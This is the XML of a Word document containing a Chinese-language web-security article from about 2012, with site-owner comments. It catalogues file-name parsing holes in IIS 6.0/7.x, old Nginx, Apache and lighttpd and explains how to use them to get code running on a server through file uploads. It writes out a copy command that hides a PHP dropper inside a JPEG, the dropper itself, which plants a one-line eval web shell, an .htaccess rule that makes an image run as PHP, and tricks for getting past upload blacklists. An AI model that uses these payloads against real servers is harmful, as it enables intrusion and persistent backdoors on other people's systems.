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932" w:rsidRPr="00CA0932" w:rsidRDefault="00CA0932" w:rsidP="00CA0932">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA0932">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Author</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA0932">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:laterain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA0932">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>From:90sec</w:t>
      </w:r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[+]IIS 6.0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7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目录解析：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/xx.asp/xx.jpg xx.jpg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可替换为任意文本文件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(e.g. xx.txt)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，文本内容为后门代码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8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IIS6.0 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会将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xx.jpg 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解析为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asp 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文件。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9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后缀解析：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/xx.asp;.jpg /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xx.asp:.jpg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(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此处</w:t>
      </w:r>
      <w:proofErr w:type="gram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需抓包修</w:t>
      </w:r>
      <w:proofErr w:type="gram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改文件名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)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10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IIS6.0 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都会把此类后缀文件成功解析为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asp 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文件。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11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t>（站长评论：</w:t>
      </w:r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t>IIS6.0</w:t>
      </w:r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t>解析漏洞的成因，可以查阅罗哥写的一篇短文：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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://lcx.cc/?i=1958" \t "_blank" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C17C43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 xml:space="preserve">IIS </w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43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文件名解析漏洞扼要分析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fldChar w:fldCharType="end"/>
      </w:r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t>）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12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{/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xx.asp:.jpg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此类文件在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Windows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下不允许存在，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:.jpg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被自动除去，剩下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/xx.asp}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13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t>（站长评论：发现错误，并不是不允许存在，这种路径叫做</w:t>
      </w:r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t>“NTFS</w:t>
      </w:r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t>数据流</w:t>
      </w:r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t>”</w:t>
      </w:r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t>，具体见：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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://lcx.cc/?i=2448" \t "_blank" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C17C43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IIS6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43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使用冒号上传漏洞，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43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IIS6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43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漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43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上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C17C43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传利用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C17C43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)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fldChar w:fldCharType="end"/>
      </w:r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t xml:space="preserve"> </w:t>
      </w:r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t>底下的评论）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14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默认解析：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/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xx.asa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/xx.cer /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xx.cdx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15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IIS6.0 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默认的可执行文件除了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asp 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还包含这三种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16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t>（站长评论：这种主要是由于在</w:t>
      </w:r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t xml:space="preserve"> IIS </w:t>
      </w:r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t>默认配置中，这几个后缀默认由</w:t>
      </w:r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t xml:space="preserve"> asp.dll </w:t>
      </w:r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t>来解析，所以执行权限和</w:t>
      </w:r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t xml:space="preserve"> .asp </w:t>
      </w:r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t>一摸一样，你可在配置中自行删除该后缀，以防止安全隐患）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17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此处可联系利用目录解析漏洞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/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xx.asa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/xx.jpg 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或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/xx.cer/xx.jpg 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或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xx.</w:t>
      </w:r>
      <w:proofErr w:type="gram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asa</w:t>
      </w:r>
      <w:proofErr w:type="gram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;.jpg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18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[+]IIS 7.0/IIS 7.5/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Nginx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&lt;=0.8.37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19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IIS 7.0/IIS 7.5/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Nginx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&lt;=0.8.37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20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在默认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Fast-CGI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开启状况下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,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在一个文件路径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(/xx.jpg)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后面加上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/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xx.php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会将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/xx.jpg/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xx.php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解析为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php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文件。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21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常用利用方法：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将一张图和一个写入后门代码的文本文件合并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将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和</w:t>
      </w:r>
      <w:proofErr w:type="gram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尾</w:t>
      </w:r>
      <w:proofErr w:type="gram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22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proofErr w:type="gram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e.g</w:t>
      </w:r>
      <w:proofErr w:type="gram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. copy xx.jpg/b + yy.txt/a xy.jpg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23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######################################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24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/b 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即二进制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[binary]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模式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25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/a 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即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ascii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模式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xx.jpg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正常图片文件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26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yy.txt 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内容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&lt;?PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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fputs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fopen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('shell.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php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','w'),'&lt;?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php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eval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($_POST[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cmd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])?&gt;');?&gt;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27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意思为写入一个内容为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&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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eval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($_POST[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cmd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])?&gt; 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名称为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shell.php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的文件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28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######################################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29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找个地方上传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xy.jpg ,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然后找到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xy.jpg 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的地址，在地址后加上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/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xx.php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即可执行恶意文本。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30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然后就在图片目录下生成一句话木马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shell.php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密码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cmd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31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[+]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Nginx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&lt;=0.8.37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32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在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Fast-CGI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关闭的情况下，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Nginx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&lt;=0.8.37 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依然存在解析漏洞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33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在一个文件路径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(/xx.jpg)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后面加上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%00.php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会将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/xx.jpg%00.php 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解析为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php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文件。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34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t>（站长评论：从</w:t>
      </w:r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t xml:space="preserve"> /test.jpg/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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t>x.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t xml:space="preserve"> </w:t>
      </w:r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t>演变过来的，具体可以参考：</w:t>
      </w:r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fldChar w:fldCharType="begin"/>
      </w:r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instrText xml:space="preserve"> HYPERLINK "http://lcx.cc/?i=1716" \t "_blank" </w:instrText>
      </w:r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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C17C43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 xml:space="preserve">Ngnix </w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43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空字节可远程执行代码漏洞</w:t>
      </w:r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fldChar w:fldCharType="end"/>
      </w:r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t>）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35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[+]Apache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36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后缀解析：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test.php.x1.x2.x3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37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Apache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将从右至</w:t>
      </w:r>
      <w:proofErr w:type="gram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左开始</w:t>
      </w:r>
      <w:proofErr w:type="gram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判断后缀，若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x3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非可识别后缀，再判断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x2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，直到找到可识别后缀为止，然后将该可识别后缀进解析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38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test.php.x1.x2.x3 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则会被解析为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php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39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经验之谈：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php|php3|phtml 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多可被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Apache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解析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40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t>（站长评论：关于</w:t>
      </w:r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t xml:space="preserve"> apache </w:t>
      </w:r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t>解析漏洞可以查阅</w:t>
      </w:r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t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C17C43">
          <w:rPr>
            <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF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color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>漏洞之后缀名解析漏洞</w:t>
        </w:r>
      </w:hyperlink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t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17C43">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）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42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[+]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其他一些可利用的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43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在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windows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环境下，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xx.jpg[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空格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] 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或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xx.</w:t>
      </w:r>
      <w:proofErr w:type="gram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jpg</w:t>
      </w:r>
      <w:proofErr w:type="gram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. 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这两类文件都是不允许存在的，若这样命名，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windows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会默认除去空格或点，这也是可以被利用的！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44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在向一台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windows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主机上传数据时，你可以抓包修改文件名，在后面加个空格或点，试图绕过黑名单，若上传成功，最后的点或空格都会被消除，这样就可得到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shell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。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45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我记得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Fck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Php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2.6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就存在加空格绕过的漏洞。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{Linux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主机中不行，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Linux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允许这类文件存在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}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46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如果在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Apache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中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.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htaccess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可被应用（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Apache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的配置文件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httpd.conf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中对目录的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AllowOverride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设置为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All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时，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apache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会应用目录下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.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htaccess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中的配置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By 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sfasfas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），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47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且可以被上传，那可以尝试在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.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htaccess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中写入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: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48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&lt;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FilesMatch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“shell.jpg”&gt; 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SetHandler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application/x-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httpd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-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php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&lt;/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FilesMatch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&gt;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49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shell.jpg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换成你上传的文件，这样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shell.jpg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就可解析为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php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文件</w:t>
      </w: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50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[+</w:t>
      </w:r>
      <w:proofErr w:type="gram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]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lighttpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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51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xx.jpg/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xx.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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52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C17C43" w:rsidRPr="00C17C43" w:rsidRDefault="00C17C43" w:rsidP="00C17C43">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480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C17C43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[Add by El4pse] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C17C43" w:rsidRPr="00C17C43" w:rsidRDefault="00C17C43" w:rsidP="00C17C43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53" w:history="1"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IIS 6.0/7.0/7.5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Nginx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、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Apache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等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 xml:space="preserve"> Web Service </w:t>
        </w:r>
        <w:r w:rsidRPr="00C17C43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解析漏洞总结</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000C2455" w:rsidRPr="00CA0932" w:rsidRDefault="000C2455" w:rsidP="00C17C43">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="000C2455" w:rsidRPr="00CA0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A09" w:rsidRDefault="00896A09" w:rsidP="00C17C43">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00896A09" w:rsidRDefault="00896A09" w:rsidP="00C17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A09" w:rsidRDefault="00896A09" w:rsidP="00C17C43">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00896A09" w:rsidRDefault="00896A09" w:rsidP="00C17C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52A"/>
    <w:rsid w:val="000C2455"/>
    <w:rsid w:val="00896A09"/>
    <w:rsid w:val="00C17C43"/>
    <w:rsid w:val="00CA0932"/>
    <w:rsid w:val="00CF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A0932"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:left w:val="single" w:sz="18" w:space="11" w:color="CCCCCC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ind w:left="300"/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0932"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial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A09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un1">
    <w:name w:val="pun1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="666600"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln1">
    <w:name w:val="pln1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit1">
    <w:name w:val="lit1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="006666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ1">
    <w:name w:val="typ1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="660066"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com1">
    <w:name w:val="com1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str1">
    <w:name w:val="str1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="008800"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd1">
    <w:name w:val="kwd1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="000088"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C17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7C4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7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7C43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17C43"/>
    <w:rPr>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="000000"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00C17C4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A0932"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:left w:val="single" w:sz="18" w:space="11" w:color="CCCCCC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ind w:left="300"/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0932"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial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A09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un1">
    <w:name w:val="pun1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="666600"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln1">
    <w:name w:val="pln1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit1">
    <w:name w:val="lit1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="006666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ1">
    <w:name w:val="typ1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="660066"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com1">
    <w:name w:val="com1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str1">
    <w:name w:val="str1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="008800"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd1">
    <w:name w:val="kwd1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CA0932"/>
    <w:rPr>
      <w:color w:val="000088"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C17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7C4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7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7C43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17C43"/>
    <w:rPr>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="000000"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00C17C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388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730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70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9D9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46690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12877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hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html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www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585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hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lcx.cc/?i=337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hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585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hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=58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ackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585.html" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackqing.com/?FoxNews=585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1083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2012-09-03T15:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-10-07T23:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>